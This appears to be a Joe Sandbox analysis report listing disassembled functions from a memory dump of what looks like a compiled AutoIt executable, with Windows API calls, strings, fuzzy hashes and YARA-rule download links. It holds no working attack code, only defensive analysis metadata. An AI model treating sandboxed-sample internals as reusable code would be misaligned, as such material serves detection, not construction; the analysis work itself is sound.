Opcode Fuzzy Hash: a592f9f2d22d1bc01886aaf2556023d04789d3aaa3dbb604d7a3560acd3ccf0e
Instruction Fuzzy Hash: 7AE16E7590021CABDF209F54CC84EFE7BBAFF05754F10915AFA19AA290DB749A81CF60

Function 006F744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006F7587
GetDesktopWindow.USER32 ref: 006F759C
GetWindowRect.USER32(00000000), ref: 006F75A3
GetWindowLongW.USER32(?,000000F0), ref: 006F7605
DestroyWindow.USER32(?), ref: 006F7631
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006F765A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006F7678
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006F769E
SendMessageW.USER32(?,00000421,?,?), ref: 006F76B3
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006F76C6
IsWindowVisible.USER32(?), ref: 006F76E6
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006F7701
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006F7715
GetWindowRect.USER32(?,?), ref: 006F772D
MonitorFromPoint.USER32(?,?,00000002), ref: 006F7753
GetMonitorInfoW.USER32 ref: 006F776D
CopyRect.USER32(?,?), ref: 006F7784
SendMessageW.USER32(?,00000412,00000000), ref: 006F77EF

Strings

tooltips_class32, xrefs: 006F7653
0, xrefs: 006F7532
(, xrefs: 006F7762

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c917342c1ae3b35b417b43ecd0cc12ab87ebfca94a004802db394ba60c6a6a95
Instruction ID: b62a584fabd6a3430cad09635a561394e41b8da20b28af869afe53763db59ca1
Opcode Fuzzy Hash: c917342c1ae3b35b417b43ecd0cc12ab87ebfca94a004802db394ba60c6a6a95
Instruction Fuzzy Hash: E0B18E71608340AFDB54DF68C944BAABBE6FF88310F00891DF6999B291DB74EC05CB95

Function 006AA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006AA839
GetSystemMetrics.USER32(00000007), ref: 006AA841
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006AA86C
GetSystemMetrics.USER32(00000008), ref: 006AA874
GetSystemMetrics.USER32(00000004), ref: 006AA899
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006AA8B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 006AA8C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006AA8F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006AA90D
GetClientRect.USER32(00000000,000000FF), ref: 006AA92B
GetStockObject.GDI32(00000011), ref: 006AA947
SendMessageW.USER32(00000000,00000030,00000000), ref: 006AA952

Part of subcall function 006AB736: GetCursorPos.USER32(000000FF), ref: 006AB749
Part of subcall function 006AB736: ScreenToClient.USER32(00000000,000000FF), ref: 006AB766
Part of subcall function 006AB736: GetAsyncKeyState.USER32(00000001), ref: 006AB78B
Part of subcall function 006AB736: GetAsyncKeyState.USER32(00000002), ref: 006AB799

SetTimer.USER32(00000000,00000000,00000028,006AACEE), ref: 006AA979

Strings

AutoIt v3 GUI, xrefs: 006AA8F1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: eec60ee90e7175730b3d7e00c3b2984c99cc4b2f0828827b2c728f2621c711aa
Instruction ID: 2d486323e974a9ad3c1fe6db37c73e4ae7f16199a3bbfad517a8d27ca2ac5f6d
Opcode Fuzzy Hash: eec60ee90e7175730b3d7e00c3b2984c99cc4b2f0828827b2c728f2621c711aa
Instruction Fuzzy Hash: 47B16D3560020AEFDB24DFA8CC45BEE7BA6BB08315F11822AFA15962D0D778EC41CF55

Function 006F69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006F6A52
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006F6B12

Strings

GETSELECTEDCOUNT, xrefs: 006F6AF5
SELECTINVERT, xrefs: 006F6BDA
ISSELECTED, xrefs: 006F6B1D
GETTEXT, xrefs: 006F6ABB
VIEWCHANGE, xrefs: 006F6CC9
SELECTALL, xrefs: 006F6B71
FINDITEM, xrefs: 006F6C7D
GETSELECTED, xrefs: 006F6C38
SELECT, xrefs: 006F6BA4
GETSUBITEMCOUNT, xrefs: 006F6A9D
GETITEMCOUNT, xrefs: 006F6A80
SELECTCLEAR, xrefs: 006F6B89
DESELECT, xrefs: 006F6BF8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: fb96cea5e6eabb19bd9455acb0b427610f25286b19cf6de2dd65b268fb2cf1c1
Instruction ID: a93f6e1cd0092940661bb8a711432c0bd9e97353bfd7cfa64bbf4d1106e11f99
Opcode Fuzzy Hash: fb96cea5e6eabb19bd9455acb0b427610f25286b19cf6de2dd65b268fb2cf1c1
Instruction Fuzzy Hash: 43A16F302042059BCB44EF14C951BBAB3A7FF45364F14896DF9969B792DB34EC0ACB46

Function 006CDD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 006CDD87
__swprintf.LIBCMT ref: 006CDE28
_wcscmp.LIBCMT ref: 006CDE3B
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006CDE90
_wcscmp.LIBCMT ref: 006CDECC
GetClassNameW.USER32(?,?,00000400), ref: 006CDF03
GetDlgCtrlID.USER32(?), ref: 006CDF55
GetWindowRect.USER32(?,?), ref: 006CDF8B
GetParent.USER32(?), ref: 006CDFA9
ScreenToClient.USER32(00000000), ref: 006CDFB0
GetClassNameW.USER32(?,?,00000100), ref: 006CE02A
_wcscmp.LIBCMT ref: 006CE03E
GetWindowTextW.USER32(?,?,00000400), ref: 006CE064
_wcscmp.LIBCMT ref: 006CE078

Strings

%s%u, xrefs: 006CDE22

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 49ced289023feff6f38af1f618f10dc0836f7cac91e7d36e2d42e50edb8cd447
Instruction ID: 9d74eb21b7a76befe7c2f6ad78dfd1e71571bf29d0f1967fb3fd3e5fd49d1ab0
Opcode Fuzzy Hash: 49ced289023feff6f38af1f618f10dc0836f7cac91e7d36e2d42e50edb8cd447
Instruction Fuzzy Hash: 22A19B71604606ABD714DF64C884FFAB7EAFF44350F00852EF9AAC6290DB34AA55CBD1

Function 006CE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 006CE6E1
_wcscmp.LIBCMT ref: 006CE6F2
GetWindowTextW.USER32(00000001,?,00000400), ref: 006CE71A
CharUpperBuffW.USER32(?,00000000), ref: 006CE737
_wcscmp.LIBCMT ref: 006CE755
_wcsstr.LIBCMT ref: 006CE766
GetClassNameW.USER32(00000018,?,00000400), ref: 006CE79E
_wcscmp.LIBCMT ref: 006CE7AE
GetWindowTextW.USER32(00000002,?,00000400), ref: 006CE7D5
GetClassNameW.USER32(00000018,?,00000400), ref: 006CE81E
_wcscmp.LIBCMT ref: 006CE82E
GetClassNameW.USER32(00000010,?,00000400), ref: 006CE856
GetWindowRect.USER32(00000004,?), ref: 006CE8BF

Strings

@, xrefs: 006CE6BC
ThumbnailClass, xrefs: 006CE7A9, 006CE829

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 4df0953925fdab6a39010a6c634b8e9c2be72df25ad9ab08b8c94a8df141530b
Instruction ID: 7efa2aa31ebdade8f27395bb16ae7449aae83dffa40ca22a1850306081843f84
Opcode Fuzzy Hash: 4df0953925fdab6a39010a6c634b8e9c2be72df25ad9ab08b8c94a8df141530b
Instruction Fuzzy Hash: D281A97100820A9BDB15CF14C881FBA7BFAEF44754F04846EFD899A192DB36DD46CBA1

Function 006CE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006CE549

Strings

[HANDLE:, xrefs: 006CE555
[ALL, xrefs: 006CE5EF
[REGEXPTITLE:, xrefs: 006CE571
HANDLE=, xrefs: 006CE542
ALL, xrefs: 006CE5DD
LAST, xrefs: 006CE50E
ACTIVE, xrefs: 006CE524
[LAST, xrefs: 006CE5F6
REGEXP=, xrefs: 006CE55E
[ACTIVE, xrefs: 006CE536
CLASSNAME=, xrefs: 006CE586
[CLASS:, xrefs: 006CE599

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 417e027be2b2d1ac270a7f158dc34ee29d5a9236725bbf5815f2af969b36fcf9
Instruction ID: 8c9e5e0c16150db8bab573e12142da4db973f74742cd528e7ae7bfa5271bab41
Opcode Fuzzy Hash: 417e027be2b2d1ac270a7f158dc34ee29d5a9236725bbf5815f2af969b36fcf9
Instruction Fuzzy Hash: 6C31CC71A44206A6CB64EB60DD93FFE73BA9F11704FA0002DF441B10E6FFA66F158629

Function 006CF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 006CF8AB
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006CF8BD
SetWindowTextW.USER32(?,?), ref: 006CF8D4
GetDlgItem.USER32(?,000003EA), ref: 006CF8E9
SetWindowTextW.USER32(00000000,?), ref: 006CF8EF
GetDlgItem.USER32(?,000003E9), ref: 006CF8FF
SetWindowTextW.USER32(00000000,?), ref: 006CF905
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006CF926
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006CF940
GetWindowRect.USER32(?,?), ref: 006CF949
SetWindowTextW.USER32(?,?), ref: 006CF9B4
GetDesktopWindow.USER32 ref: 006CF9BA
GetWindowRect.USER32(00000000), ref: 006CF9C1
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006CFA0D
GetClientRect.USER32(?,?), ref: 006CFA1A
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006CFA3F
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006CFA6A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 6b06572f50c1c8ae0e6cc4068e3dc6891e4cabd866c5ee81a1d1d6b974a00eae
Instruction ID: f0d7ac03c33816ad0c5e9896d70ab3256df754c9718a98b65371c12953a77582
Opcode Fuzzy Hash: 6b06572f50c1c8ae0e6cc4068e3dc6891e4cabd866c5ee81a1d1d6b974a00eae
Instruction Fuzzy Hash: BD513E70900709AFDB209FA8CD85FAEBBB6FF04705F00852DE596A26A0C778AD44CF54

Function 006E01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 006E026A
_wcschr.LIBCMT ref: 006E0278
_wcscpy.LIBCMT ref: 006E028F
_wcscat.LIBCMT ref: 006E029E
_wcscat.LIBCMT ref: 006E02BC
_wcscpy.LIBCMT ref: 006E02DD
__wsplitpath.LIBCMT ref: 006E03BA
_wcscpy.LIBCMT ref: 006E03DF
_wcscpy.LIBCMT ref: 006E03F1
_wcscpy.LIBCMT ref: 006E0406
_wcscat.LIBCMT ref: 006E041B
_wcscat.LIBCMT ref: 006E042D
_wcscat.LIBCMT ref: 006E0442

Part of subcall function 006DC890: _wcscmp.LIBCMT ref: 006DC92A
Part of subcall function 006DC890: __wsplitpath.LIBCMT ref: 006DC96F
Part of subcall function 006DC890: _wcscpy.LIBCMT ref: 006DC982
Part of subcall function 006DC890: _wcscat.LIBCMT ref: 006DC995
Part of subcall function 006DC890: __wsplitpath.LIBCMT ref: 006DC9BA
Part of subcall function 006DC890: _wcscat.LIBCMT ref: 006DC9D0
Part of subcall function 006DC890: _wcscat.LIBCMT ref: 006DC9E3

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 006E0235

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 2128968e8981710cb62b1f6b92c87cb90bec05a7937041fc796caec80078cb6b
Instruction ID: cdd1b79191db601fb2abcde8119ec2937444ced78fb8a985adec435f60c35787
Opcode Fuzzy Hash: 2128968e8981710cb62b1f6b92c87cb90bec05a7937041fc796caec80078cb6b
Instruction Fuzzy Hash: F391C071504342AFDB60EF50C951FDBB3EAAF85310F00485EF5499B291EB74EA88CB56

Function 006FCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006FCD0B
DestroyWindow.USER32(00000000,?), ref: 006FCD83

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006FCE04
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006FCE26
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006FCE35
DestroyWindow.USER32(?), ref: 006FCE52
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00690000,00000000), ref: 006FCE85
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006FCEA4
GetDesktopWindow.USER32 ref: 006FCEB9
GetWindowRect.USER32(00000000), ref: 006FCEC0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006FCED2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006FCEEA

Part of subcall function 006AB155: GetWindowLongW.USER32(?,000000EB), ref: 006AB166

Strings

tooltips_class32, xrefs: 006FCDFD, 006FCE7E
0, xrefs: 006FCD2B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 34e6ea9b2eb6f1a7f064f964c2b9a18ba6934561b57fa5f96bbbbe2b26e89438
Instruction ID: a765d9cc2e1e8d7082eb0c8aa8524fbacabdd36c85d1b4a32bba9bea6fa620e8
Opcode Fuzzy Hash: 34e6ea9b2eb6f1a7f064f964c2b9a18ba6934561b57fa5f96bbbbe2b26e89438
Instruction Fuzzy Hash: D3718871140349AFEB21CF28DC45FBA3BE6AB89724F444918FA85973A1D774AC01CB15

Function 006DB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 006DB46D
VariantCopy.OLEAUT32(?,?), ref: 006DB476
VariantClear.OLEAUT32(?), ref: 006DB482
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006DB561
__swprintf.LIBCMT ref: 006DB591
VarR8FromDec.OLEAUT32(?,?), ref: 006DB5BD
VariantInit.OLEAUT32(?), ref: 006DB63F
SysFreeString.OLEAUT32(00000016), ref: 006DB6D1
VariantClear.OLEAUT32(?), ref: 006DB727
VariantClear.OLEAUT32(?), ref: 006DB736
VariantInit.OLEAUT32(00000000), ref: 006DB772

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 006DB58B
Default, xrefs: 006DB615

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 4fa2981f99b9dd4b2e752d12c722dfee8f71946e8a9cdef10d9f07c9fc991dab
Instruction ID: 6112060b7abd57be185b1dd6b6135c3e813add0f9caca5ff31102cbabf216b09
Opcode Fuzzy Hash: 4fa2981f99b9dd4b2e752d12c722dfee8f71946e8a9cdef10d9f07c9fc991dab
Instruction Fuzzy Hash: 6AC1CD71D00215DBCF10DFA9D494BAAB7F6FF05300B16946AE8059B78ADB74EC41DBA0

Function 006F6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006F6FF9
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006F7044

Strings

UNCHECK, xrefs: 006F7208
ISCHECKED, xrefs: 006F71AF
GETSELECTED, xrefs: 006F713C
SELECT, xrefs: 006F71DD
EXISTS, xrefs: 006F70AD
GETTEXT, xrefs: 006F717F
GETITEMCOUNT, xrefs: 006F710E
GETTOTALCOUNT, xrefs: 006F7027
CHECK, xrefs: 006F7064
EXPAND, xrefs: 006F70DE
COLLAPSE, xrefs: 006F708A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4789869b91ccb440a9c5a760b8b04a56a1a5cc9618750ed08dd7b5d74f21c7c2
Instruction ID: ba02099c51da283bb53a793d9bdd944d188a07b75504fe09fbf90037f85748a9
Opcode Fuzzy Hash: 4789869b91ccb440a9c5a760b8b04a56a1a5cc9618750ed08dd7b5d74f21c7c2
Instruction Fuzzy Hash: C791A1702086018FCB44EF14C851A7AB7E7AF85360F04886DF9965B792CB35ED0ACB86

Function 006FE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006FE3BB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006FBCBF), ref: 006FE417
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006FE457
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006FE49C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006FE4D3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,006FBCBF), ref: 006FE4DF
